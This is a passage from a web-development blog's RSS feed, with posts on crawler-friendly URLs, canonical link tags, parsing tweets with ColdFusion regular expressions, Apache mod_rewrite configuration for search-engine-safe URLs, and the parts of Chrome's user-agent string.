If you have a calendar with infinite past and future dates, or a list with infinite pagination, you have what is described as an <q>infinite crawl space</q>, which is a huge burden on crawlers. To resolve the calendar issue, you can add <code>rel=&quot;nofollow&quot;</code> attributes to links to dynamically created future calendar pages. When creating pagination links, disable the previous and next links when the first and last pages are reached, and redirect users to an appropriate page if the query string in the <abbr title="Uniform Resource Locator">URL</abbr> is <q>hacked</q> (this may be a static <q>page not found</q> page).
</li>
<li><strong>Utilise the robots.txt file to prevent actions the web crawlers can&#8217;t or shouldn&#8217;t perform.</strong><br />
Using a <a href="http://www.robotstxt.org" title="Robots.txt" target="_blank" rel="nofollow">robots.txt</a> file, you can disallow crawling of login pages, contact forms, shopping carts, and other pages whose sole functionality is something that a crawler can&#8217;t and shouldn&#8217;t perform. This lets crawlers spend more of their time crawling content that they can actually do something with.
</li>
<li><strong>Prevent duplicate content.</strong><br />
An ideal scenario for crawlers is a one-to-one link between content and a <abbr title="Uniform Resource Locator">URL</abbr>. Each <abbr title="Uniform Resource Locator">URL</abbr> leads to a unique bit of content and each piece of content can be accessed by a unique <abbr title="Uniform Resource Locator">URL</abbr>. The closer your site can get to this scenario, the more streamlined your site will be for crawling and indexing. If your CMS makes this difficult to achieve, you can use the <a href="/canonical-urls-what-are-they-all-about">canonical tag</a> to indicate a preferred <abbr title="Uniform Resource Locator">URL</abbr> for duplicate content.
</li>
</ul>
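<p>As a rough sketch of the redirect half of the first idea above, assuming an Apache webserver with <code>mod_rewrite</code> enabled, an <code>.htaccess</code> file in the web root, and a hypothetical session parameter called <code>sid</code> that is the only parameter in the query string, the rules might look something like this. Storing the value in a cookie is left to your application:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteEngine On
# Hypothetical parameter name: match a query string made up solely of sid=...
RewriteCond %{QUERY_STRING} ^sid=[^&amp;]+$
# Redirect permanently to the same path; the trailing ? drops the query string
RewriteRule ^(.*)$ /$1? [R=301,L]</pre></div></div>

<p>Once the redirect has happened the query string is empty, so the condition no longer matches and the rule cannot loop.</p>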
<p>More information on this topic can be found on the <a href="http://sites.google.com/site/webmasterhelpforum/en/faq--crawling--indexing---ranking#duplicate-content" title="Google Webmaster Central Blog" target="_blank" rel="nofollow">Google Webmaster Central Blog</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/optimise-your-urls-for-web-crawlers-and-indexing/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Canonical URLs &#8211; What Are They All About?</title>
		<link>http://www.simonwhatley.co.uk/canonical-urls-what-are-they-all-about</link>
		<comments>http://www.simonwhatley.co.uk/canonical-urls-what-are-they-all-about#comments</comments>
		<pubDate>Wed, 07 Oct 2009 09:34:23 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Analytics]]></category>
		<category><![CDATA[Search]]></category>
		<category><![CDATA[Canonical]]></category>
		<category><![CDATA[Duplicate content]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[search engine]]></category>
		<category><![CDATA[search engine optimisation]]></category>
		<category><![CDATA[Search engine optimization]]></category>
		<category><![CDATA[search engines]]></category>
		<category><![CDATA[search results]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Uniform Resource Identifier]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[web application]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=2043</guid>
		<description><![CDATA[Carpe diem on any duplicate content worries: Google, Yahoo and Microsoft now support a format that allows you to publicly specify your preferred version of a URL. If your site has identical or vastly similar content that’s accessible through multiple URLs, this format provides you with more control over the URL returned in search results. It also helps to make sure that properties such as link popularity are consolidated to your preferred version.]]></description>
			<content:encoded><![CDATA[<p>As long ago as February, Google announced a new canonical <abbr title="Uniform Resource Locator">URL</abbr> tag on their official <a href="http://googlewebmastercentral.blogspot.com/2009/02/specify-your-canonical.html" title="" target="_blank" rel="nofollow ">Webmaster Central Blog</a>:</p>
<blockquote><p>Carpe diem on any duplicate content worries: we now support a format that allows you to publicly specify your preferred version of a URL. If your site has identical or vastly similar content that&#8217;s accessible through multiple URLs, this format provides you with more control over the URL returned in search results. It also helps to make sure that properties such as link popularity are consolidated to your preferred version.</p></blockquote>
<p>But what do they mean by <q>canonical</q>? One of the definitions of <q>canonical</q> is <q>reduced to the simplest and most significant form possible without loss of generality.</q></p>
<p>What this means is that if you have a page&#8211;let&#8217;s take an e-commerce product page&#8211;and the simplest <abbr title="Uniform Resource Locator">URL</abbr> by which you want it to be accessible is:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.site.com/category/product.html</pre></div></div>

<p>you can add the canonical tag to that specific product page. Google, Yahoo and Microsoft use this tag to work out which <abbr title="Uniform Resource Locator">URL</abbr> they should treat as the preferred one for the current page.</p>
<p>Now, let&#8217;s say that the particular software you use <strong>also</strong> allows you to access the same product using:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.site.com/company/product.html</pre></div></div>

<p>and</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.site.com/different_category/product.html</pre></div></div>

<p>Perhaps this one product is in multiple categories. With the canonical tag in place, whenever one of the alternate pages is loaded, the tag tells any search engine that this is really the same product as the page you defined in the canonical tag. So, you can still make the content available however you need to (by categories, tags, or some other organisation system) while avoiding having it treated as duplicate content and penalised.</p>
<p>To implement the canonical <abbr title="Uniform Resource Locator">URL</abbr> tag in your web application, you simply need to add the following inside the <code>&lt;head&gt;</code> section of each page that duplicates the content:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;link rel=&quot;canonical&quot; href=&quot;http://www.site.com/category/product.html&quot; /&gt;</pre></div></div>

<p>As Google mention, this tag is a hint that they <q>honour strongly</q>. Google will take your preference into account, in conjunction with other signals, when calculating the most relevant page to display in search results.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/canonical-urls-what-are-they-all-about/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Parsing Twitter Usernames, Hashtags and URLs with ColdFusion</title>
		<link>http://www.simonwhatley.co.uk/parsing-twitter-usernames-hashtags-and-urls-with-coldfusion</link>
		<comments>http://www.simonwhatley.co.uk/parsing-twitter-usernames-hashtags-and-urls-with-coldfusion#comments</comments>
		<pubDate>Fri, 01 May 2009 11:24:07 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[GPS]]></category>
		<category><![CDATA[GPS logger]]></category>
		<category><![CDATA[Holux M-241 GPS Receiver]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[New Brunswick]]></category>
		<category><![CDATA[online resource]]></category>
		<category><![CDATA[parsing]]></category>
		<category><![CDATA[tag]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[username]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=1907</guid>
		<description><![CDATA[Some time ago, well almost a year ago actually, I posted an article called Parsing Twitter Usernames, Hashtags and URLs with JavaScript. From that article, it became immediately apparent that this was an issue many people were confronting and one that required an answer. Now, belatedly, it is the turn of ColdFusion to get the Twitter love.]]></description>
			<content:encoded><![CDATA[<p>Some time ago, well almost a year ago actually, I posted an article called <a href="/parsing-twitter-usernames-hashtags-and-urls-with-javascript">Parsing Twitter Usernames, Hashtags and URLs with JavaScript</a>. From that article, it became immediately apparent that this was an issue many people were confronting and one that required an answer. Now, belatedly, it is the turn of ColdFusion to get the Twitter love.</p>
<p>Compared to JavaScript, it is far easier to parse the <abbr title="Uniform Resource Locator">URL</abbr>s, usernames and hashtags in a tweet using ColdFusion, and doing so needs only minor amendments to the regular expressions used in the JavaScript code.</p>
<p>Below is an example tweet that I&#8217;ll use for this post.</p>

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfset</span> myTweet <span style="color: #0000ff">=</span> <span style="color: #009900;">&quot;Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call @fordie. http://bit.ly/2RsAu ##holux ##gpslogger&quot;</span> <span style="color: #0000ff;">/</span><span style="color: #800000;">&gt;</span></span></pre></div></div>

<p><abbr title="Nota bene (please note)">NB</abbr>. For the purpose of this test, I need to double-hash the hashtags to prevent ColdFusion throwing an error, because ColdFusion treats a single <code>#</code> inside a string as the start of an expression.</p>
<h3>Parsing URLs as Links to the resource</h3>
<p>We can simply demonstrate the parsing of the link with the following code in the body of the page:</p>

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfset</span> myTweet <span style="color: #0000ff">=</span> <span style="color: #800080;">REReplace</span><span style="color: #000000;">&#40;</span>myTweet,<span style="color: #009900;">'([A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&amp;\?\/.=]+)'</span>,<span style="color: #009900;">'&lt;a href=&quot;\1&quot;&gt;</span></span>\1<span style="color: #333333;"><span style="color: #800000;">&lt;</span><span style="color: #0000ff;">/</span>a<span style="color: #0000ff;">&gt;</span></span>','ALL') /&gt;</pre></div></div>

<p><abbr title="Nota bene (please note)">NB</abbr>. The <code>\1</code> is a backreference to part of the regular expression match. A backreference stores the part of the string matched by the part of the regular expression inside the parentheses. This means you can reuse it inside the regular expression, or afterwards in the replacement string, as I am doing in each of these examples.</p>
<p>The resultant HTML generated is the following:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call @fordie. &lt;a href=&quot;http://bit.ly/2RsAu&quot;&gt;http://bit.ly/2RsAu&lt;/a&gt; #holux #gpslogger</pre></div></div>

<h3>Parsing Usernames as Links to Twitter</h3>
<p>Following on from the <abbr title="Uniform Resource Locator">URL</abbr> example above, we can apply a similar methodology to Twitter usernames, since each one can also be linked to its associated Twitter page.</p>
<p>We can simply demonstrate this with the following code:</p>

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfset</span> myTweet <span style="color: #0000ff">=</span> <span style="color: #800080;">REReplace</span><span style="color: #000000;">&#40;</span>myTweet,<span style="color: #009900;">'[@]+([A-Za-z0-9-_]+)'</span>,<span style="color: #009900;">'&lt;a href=&quot;http://twitter.com/\1&quot; rel=&quot;nofollow&quot;&gt;</span></span>@\1<span style="color: #333333;"><span style="color: #800000;">&lt;</span><span style="color: #0000ff;">/</span>a<span style="color: #0000ff;">&gt;</span></span>','ALL') /&gt;</pre></div></div>

<p>The regular expression in this case finds all instances of <code>@username</code>. The Twitter <abbr title="Universal Resource Locator">URL</abbr> is then applied to the username.</p>
<p>The resultant HTML generated is the following:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call &lt;a href=&quot;http://twitter.com/fordie&quot; rel=&quot;nofollow&quot;&gt;@fordie&lt;/a&gt;. http://bit.ly/2RsAu #holux #gpslogger</pre></div></div>

<h3>Parsing Hashtags as Links to Twitter’s Search</h3>
<p>Finally, Twitter also allows users to create hashtags within their posts. Hashtags are a community-driven convention for adding additional context and metadata to your tweets. Like regular <abbr title="Uniform Resource Locator">URL</abbr>s and usernames, hashtags can be parsed as a <abbr title="Uniform Resource Locator">URL</abbr> to an online resource, in this case, Twitter’s search.</p>
<p>We can simply demonstrate this with the following code:</p>

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfset</span> myTweet <span style="color: #0000ff">=</span> <span style="color: #800080;">REReplace</span><span style="color: #000000;">&#40;</span>myTweet,<span style="color: #009900;">'[##]+([A-Za-z0-9-_]+)'</span>,<span style="color: #009900;">'&lt;a href=&quot;http://search.twitter.com/search?q=%23\1&quot; rel=&quot;nofollow&quot;&gt;</span></span><span style="color: #0000ff;">##</span>\1<span style="color: #333333;"><span style="color: #800000;">&lt;</span><span style="color: #0000ff;">/</span>a<span style="color: #0000ff;">&gt;</span></span>','ALL') /&gt;</pre></div></div>

<p>The regular expression in this case finds all instances of <code>#hashtag</code>. The Twitter Search <abbr title="Universal Resource Locator">URL</abbr> is then applied to the hashtag.</p>
<p>The resultant HTML generated is the following:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call @fordie. http://bit.ly/2RsAu &lt;a href=&quot;http://search.twitter.com/search?q=%23holux&quot; rel=&quot;nofollow&quot;&gt;#holux&lt;/a&gt; &lt;a href=&quot;http://search.twitter.com/search?q=%23gpslogger&quot; rel=&quot;nofollow&quot;&gt;#gpslogger&lt;/a&gt;</pre></div></div>

<h3>All in one</h3>
<p>So, putting all the regular expressions together, you would end up with the following:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call &lt;a href=&quot;http://twitter.com/fordie&quot; rel=&quot;nofollow&quot;&gt;@fordie&lt;/a&gt;. &lt;a href=&quot;http://bit.ly/2RsAu&quot;&gt;http://bit.ly/2RsAu&lt;/a&gt; &lt;a href=&quot;http://search.twitter.com/search?q=%23holux&quot; rel=&quot;nofollow&quot;&gt;#holux&lt;/a&gt; &lt;a href=&quot;http://search.twitter.com/search?q=%23gpslogger&quot; rel=&quot;nofollow&quot;&gt;#gpslogger&lt;/a&gt;</pre></div></div>

<p>Which translates as the more useful tweet:</p>
<p>Woot! I&#8217;ve just taken receipt of my Holux M-241 GPS logger. Good call <a href="http://twitter.com/fordie" rel="nofollow">@fordie</a>. <a href="http://bit.ly/2RsAu">http://bit.ly/2RsAu</a> <a href="http://search.twitter.com/search?q=%23holux" rel="nofollow">#holux</a> <a href="http://search.twitter.com/search?q=%23gpslogger" rel="nofollow">#gpslogger</a></p>
<h3>Where to take it next</h3>
<p>Wrapping these code snippets up into <a href="/examples/twitter/twitterise/twitterise.txt">a simple twitterise function</a> would be a good starter for ten. Following that, we could also create a simple Twitter feed reader, but I&#8217;ll leave that up to you to develop.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/parsing-twitter-usernames-hashtags-and-urls-with-coldfusion/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Enabling Search Engine Safe URLs with Apache and htaccess</title>
		<link>http://www.simonwhatley.co.uk/enabling-search-engine-safe-urls-with-apache-and-htaccess</link>
		<comments>http://www.simonwhatley.co.uk/enabling-search-engine-safe-urls-with-apache-and-htaccess#comments</comments>
		<pubDate>Mon, 08 Dec 2008 15:57:15 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Search]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[All]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[ColdBox]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[Fusebox]]></category>
		<category><![CDATA[HTTP]]></category>
		<category><![CDATA[httpd.conf]]></category>
		<category><![CDATA[ISAPI]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[mod_rewrite]]></category>
		<category><![CDATA[New Brunswick]]></category>
		<category><![CDATA[None]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[search engine]]></category>
		<category><![CDATA[search engine optimisation]]></category>
		<category><![CDATA[search engine robots]]></category>
		<category><![CDATA[search engine safe]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[URL rewriting]]></category>
		<category><![CDATA[USD]]></category>
		<category><![CDATA[web applications]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=1635</guid>
		<description><![CDATA[An increasingly popular technique among websites, and blogs in particular, is making URLs search engine friendly, or safe, on the premise that doing so will help search engine optimisation. Removing the obscure query string element of a URL and replacing it with keyword-rich alternatives makes it more readable not only for human beings, but also for the venerable robots that allow our page content to be found in the first place.]]></description>
			<content:encoded><![CDATA[<p>An increasingly popular technique among websites, and blogs in particular, is making <abbr title="Uniform Resource Locator">URL</abbr>s search engine friendly, or safe, on the premise that doing so will help search engine optimisation. Removing the obscure query string element of a <abbr title="Uniform Resource Locator">URL</abbr> and replacing it with keyword-rich alternatives makes it more readable not only for human beings, but also for the venerable robots that allow our page content to be found in the first place.</p>
<p>For example, the following is WordPress&#8217; default URL configuration for a post:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/?p=1635</pre></div></div>

<p>However, by using the URL rewriting available in the Apache webserver, we can achieve a far better result, such as the following:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/search-engine-safe-urls</pre></div></div>

<p>NB. It is also possible to achieve a similar result with an <abbr title="Internet Server Application Programming Interface">ISAPI</abbr> rewrite for Microsoft&#8217;s <abbr title="Internet Information Services">IIS</abbr> webserver, but that topic is not covered in this post.</p>
<p>To get your website working with <abbr title="search engine safe">SES</abbr> <abbr title="Uniform Resource Locator">URL</abbr>s you need to enable both the <code>mod_rewrite</code> module and the <code>AllowOverride</code> directive in the Apache configuration file.</p>
<p>Uncomment the following line (remove the leading #) to load the rewrite module:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">LoadModule rewrite_module modules/mod_rewrite.so</pre></div></div>

<p>Change the <code>AllowOverride</code> directive from <q>None</q> to <q>All</q>:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;directory /&gt;
    Options FollowSymLinks
    AllowOverride all
    Order deny,allow
    Deny from all
&lt;/directory&gt;
&nbsp;
&lt;directory &quot;C:/WebRoot&quot;&gt;
    # Possible values for the Options directive are &quot;None&quot;, &quot;All&quot;,
    # or any combination of:
    #   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
    #
    # Note that &quot;MultiViews&quot; must be named *explicitly* --- &quot;Options All&quot;
    # doesn't give it to you.
    #
    # The Options directive is both complicated and important.  Please see
    # http://httpd.apache.org/docs/2.2/mod/core.html#options
    # for more information.
    #
    Options Indexes FollowSymLinks
&nbsp;
    #
    # AllowOverride controls what directives may be placed in .htaccess files.
    # It can be &quot;All&quot;, &quot;None&quot;, or any combination of the keywords:
    #   Options FileInfo AuthConfig Limit
    #
    AllowOverride All
&nbsp;
    #
    # Controls who can get stuff from this server.
    #
    Order allow,deny
    Allow from all
&lt;/directory&gt;</pre></div></div>

<p>On Apache webservers, <code>.htaccess</code> (hypertext access) is the default name of directory-level configuration files. An <code>.htaccess</code> file is placed in a particular directory, and the directives in the <code>.htaccess</code> file apply to that directory and all its subdirectories. It provides the ability to customise configuration for requests to that particular directory, which in our case means enabling search engine safe (<abbr title="search engine safe">SES</abbr>) <abbr title="Uniform Resource Locator">URL</abbr>s.</p>
<p>Setting the <code>AllowOverride</code> directive to <q>All</q> in effect defers configuration settings to the <code>.htaccess</code> file.</p>
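<p>Note that <q>All</q> is the broadest setting. As a narrower sketch, assuming the only thing you need from <code>.htaccess</code> is <code>mod_rewrite</code>, the <code>FileInfo</code> keyword should be enough, since that is the override class the rewrite directives belong to (the <code>C:/WebRoot</code> path is simply carried over from the example above):</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;directory &quot;C:/WebRoot&quot;&gt;
    # FollowSymLinks (or SymLinksIfOwnerMatch) must be on for per-directory rewrites
    Options Indexes FollowSymLinks
    # Allow only FileInfo directives, which include RewriteEngine, RewriteCond and RewriteRule
    AllowOverride FileInfo
    Order allow,deny
    Allow from all
&lt;/directory&gt;</pre></div></div>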
<p>An example <code>.htaccess</code> file could include the following code to rewrite the URLs:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L,QSA]</pre></div></div>

<p>Search engine friendly <abbr title="Uniform Resource Locator">URL</abbr>s are implemented with rewrite engines. The rewrite engine modifies the <abbr title="Uniform Resource Locator">URL</abbr> based upon a number of rewrite conditions and rules.</p>
<p>The <code>RewriteBase</code> directive explicitly sets the base <abbr title="Uniform Resource Locator">URL</abbr> for per-directory rewrites. The <code>RewriteCond</code> directive defines a rule condition; in this case, the two conditions restrict the rule to requests that do not match an existing file (<code>!-f</code>) or directory (<code>!-d</code>). Finally, the <code>RewriteRule</code> directive is the real rewriting workhorse. In this example, we&#8217;re capturing the whole of the <abbr title="Uniform Resource Identifier">URI</abbr>, i.e. everything after the protocol (HTTP/S) and domain name, with a regular expression. This is then appended to the default file reference, index.php, as a <a href="http://www.regular-expressions.info/brackets.html" title="Regular Expression: back references" target="_blank" rel="nofollow">back reference</a>. The <code>[L,QSA]</code> flags mark the rule as the last one to be processed and append any query string parameters to the rewritten request. It is important to note that this is all done on the server side; the user will never see the website address changing in the browser&#8217;s address bar. Furthermore, simply replacing the index.php filename with your own default file name (e.g. index.cfm, default.aspx) will have the same result. Indeed, the above rewrite rules are becoming a de facto standard for web applications.</p>
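<p>To make the flow a little more concrete, here is the same rule set again with comments tracing a hypothetical request for <code>/search-engine-safe-urls?page=2</code> (the <code>page</code> parameter is made up purely for illustration, and the sketch assumes no file or directory of that name exists):</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteEngine On
RewriteBase /
# Request: /search-engine-safe-urls?page=2
# Skip the rule if the path is an existing file...
RewriteCond %{REQUEST_FILENAME} !-f
# ...or an existing directory
RewriteCond %{REQUEST_FILENAME} !-d
# $1 = search-engine-safe-urls, so the request is handled internally as
# /index.php/search-engine-safe-urls with page=2 carried along
RewriteRule ^(.*)$ index.php/$1 [L,QSA]</pre></div></div>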
<p>To fully understand the <code>mod_rewrite</code> rules above, look at the <a href="http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html" title="Apache mod_rewrite documentation" target="_blank" rel="nofollow">Apache mod_rewrite documentation</a>.</p>
<p>Once you have your <abbr title="Search Engine Safe">SES</abbr> functionality in place on the webserver, it is then the responsibility of your application framework to understand the <abbr title="Uniform Resource Locator">URL</abbr> construction and handle it accordingly. Fortunately, frameworks such as <a href="http://www.coldboxframework.com" title="ColdBox Framework" target="_blank" rel="nofollow">ColdBox</a> and <a href="http://www.fusebox.org" title="Fusebox Framework" target="_blank" rel="nofollow" >Fusebox</a> for ColdFusion, and <a href="http://framework.zend.com" title="Zend PHP framework" target="_blank" rel="nofollow">Zend</a> and <a href="http://www.symfony-project.com" title="Symfony PHP framework" target="_blank" rel="nofollow">Symfony</a> for <abbr title="PHP: Hypertext Preprocessor">PHP</abbr>, all contain functionality to do this, but that is the subject of an entirely different post.</p>
<p>Users of web applications prefer short, neat <abbr title="Uniform Resource Locator">URL</abbr>s to raw query string parameters. A concise <abbr title="Uniform Resource Locator">URL</abbr> is easy to remember, and less time-consuming to type in. If the <abbr title="Uniform Resource Locator">URL</abbr> can be made to relate clearly to the content of the page, then not only are errors less likely to happen, but our good friends the search engine robots are also able to draw a stronger assumption of the page&#8217;s relevance and content.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/enabling-search-engine-safe-urls-with-apache-and-htaccess/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>What&#039;s In Google Chrome&#039;s User-Agent String</title>
		<link>http://www.simonwhatley.co.uk/whats-in-google-chromes-user-agent-string</link>
		<comments>http://www.simonwhatley.co.uk/whats-in-google-chromes-user-agent-string#comments</comments>
		<pubDate>Fri, 12 Sep 2008 12:10:43 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Browsers]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Chrome's address bar]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[Google Inc.]]></category>
		<category><![CDATA[HTTP]]></category>
		<category><![CDATA[HyperText Transfer Protocol]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Internet users]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[mobile phones]]></category>
		<category><![CDATA[Mozilla]]></category>
		<category><![CDATA[Official Build Google Inc.]]></category>
		<category><![CDATA[Opera]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[Safari]]></category>
		<category><![CDATA[United States]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[User Agent]]></category>
		<category><![CDATA[web crawlers]]></category>
		<category><![CDATA[Web Standards era]]></category>
		<category><![CDATA[webmaster]]></category>
		<category><![CDATA[windowing system]]></category>
		<category><![CDATA[Windows NT]]></category>
		<category><![CDATA[X11]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=1123</guid>
		<description><![CDATA[With the advent of Google Chrome there has been a lot of media coverage regarding the browser’s uptake and how it will compete with Internet Explorer, Firefox and Safari. This is where the User Agent becomes most valuable.]]></description>
			<content:encoded><![CDATA[<p>With the advent of <a href="http://www.google.com/chrome/" title="" target="_blank" rel="nofollow">Google Chrome</a> there has been a lot of media coverage regarding the browser&#8217;s uptake and how it will compete with Internet Explorer, Firefox and Safari. This is where the User Agent becomes most valuable. It can be used in analytics software to determine the browser share and consequently aid the development of the website.</p>
<p>But what is a User Agent? A User Agent is the client application used with a particular network protocol; the phrase is most commonly used in reference to those which access the Web. Web user agents range from web browsers and e-mail clients to search engine crawlers (<q>spiders</q>), as well as mobile phones, screen readers and braille browsers used by people with disabilities. When Internet users visit a web site, a text string is generally sent to identify the user agent to the server. This forms part of the <abbr title="HyperText Transfer Protocol">HTTP</abbr> request, prefixed with <strong>user-agent:</strong>, and typically includes information such as the application name, version, host operating system, and language. Bots, such as web crawlers, often also include a <abbr title="Uniform Resource Locator">URL</abbr> and/or e-mail address so that the webmaster can contact the operator of the bot.</p>
<p>By simply typing <strong>about:version</strong> into Chrome&#8217;s address bar you will be presented with the following information:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">Google Chrome
0.2.149.29 (1798)
Official Build
Google Inc.
Copyright © 2006-2008 Google Inc. All Rights Reserved.
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13</pre></div></div>

<p>As you can see, Chrome&#8217;s version information provides limited detail about the browser. The last line is the important one. It is the value of the <abbr title="HyperText Transfer Protocol">HTTP</abbr> <em>User-Agent</em> header:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13</pre></div></div>

<p>If you know the <a href="http://tools.ietf.org/html/rfc2616" title="RFC 2616 Hypertext Transfer Protocol - HTTP/1.1" target="_blank" rel="nofollow">RFC 2616</a> specification on the HyperText Transfer Protocol (which, incidentally, I gladly don&#8217;t), you would know that the User Agent, or more formally the product token, should be short and to the point:</p>
<blockquote><p>
Product tokens SHOULD be short and to the point. They MUST NOT be used for advertising or other non-essential information. Although any token character MAY appear in a product-version, this token SHOULD only be used for a version identifier (i.e., successive versions of the same product SHOULD differ only in the product-version portion of the product value).
</p></blockquote>
<p>Clearly this isn&#8217;t the case! One of Google&#8217;s reasons behind creating the Chrome browser was to start afresh. It would therefore have been truly amazing if they had made the string simply <em>Chrome/0.2.149.29</em>.</p>
<p>Unfortunately, <a href="http://en.wikipedia.org/wiki/Browser_sniffing" title="Wikipedia: Browser Sniffing" target="_blank" rel="nofollow">browser sniffing</a> makes an ever-growing <abbr title="User-Agent">UA</abbr> string the path of least resistance for browser vendors.</p>
<p>So, what does Chrome&#8217;s User Agent string actually mean?</p>
<ul>
<li><strong>Mozilla/</strong> &#8211; This means that the browser has the kind of capabilities that Netscape 1.1 had compared to <a href="http://en.wikipedia.org/wiki/Mosaic_(web_browser)" title="Wikipedia: Mosaic Web Browser" target="_blank" rel="nofollow">Mosaic</a> and <a href="http://en.wikipedia.org/wiki/Lynx_(web_browser)" title="Wikipedia: Lynx Web Browser" target="_blank" rel="nofollow">Lynx</a>.</li>
<li><strong>5.0</strong> &#8211; This means that the browser engine is from the post-Browser War Web Standards era as opposed to being from the Browser War era.</li>
<li><strong>(Windows;</strong> &#8211; This means that the general windowing system flavor the browser runs on is Windows (as opposed to, for example, Apple or X11).</li>
<li><strong>U;</strong> &#8211; This means that the browser has at least the level of <a href="http://en.wikipedia.org/wiki/User_agent#Encryption_strength_.22U.22_.2F_.22I.22_.2F_.22N.22" title="Wikipedia: Encryption Strength" target="_blank" rel="nofollow">cryptographic capability / encryption strength</a> that U.S. versions of browsers had in the late 1990s.</li>
<li><strong>Windows NT 6.0;</strong> &#8211; This indicates the operating system the browser is running on. In this instance, the browser is running on Windows Vista.</li>
